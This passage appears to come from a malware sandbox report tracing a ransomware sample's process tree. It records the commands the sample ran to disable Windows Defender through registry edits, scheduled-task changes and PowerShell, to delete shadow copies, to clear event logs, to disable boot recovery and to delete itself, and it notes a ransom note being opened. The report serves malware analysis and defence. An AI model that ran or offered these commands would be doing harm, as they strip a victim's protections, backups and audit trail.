  [2] C:\Windows\SYSTEM32\reg.exe (PID 2724)
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SYSTEM32\reg.exe (PID 1044)
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SYSTEM32\reg.exe (PID 1208)
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SYSTEM32\reg.exe (PID 1212)
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  [2] C:\Windows\SYSTEM32\reg.exe (PID 3156)
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  [2] C:\Windows\SYSTEM32\reg.exe (PID 3036)
      reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:3940
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:3748
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:2740
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1988
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1676
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:4060
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:2732
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1424
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:3516
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1384 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1808 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1976 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1844
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3064
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:836
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1040
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:3300 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3744
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:2340 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3852 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:644 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:864 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1352 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3260 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1628 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1592 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1204
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:3556 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2968
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2288 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1924
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4056 -
C:\Windows\SYSTEM32\notepad.exenotepad.exe C:\LdBi_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:4016 -
C:\Windows\SYSTEM32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe"2⤵PID:3032
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:3664
Network
MITRE ATT&CK Enterprise v6
Downloads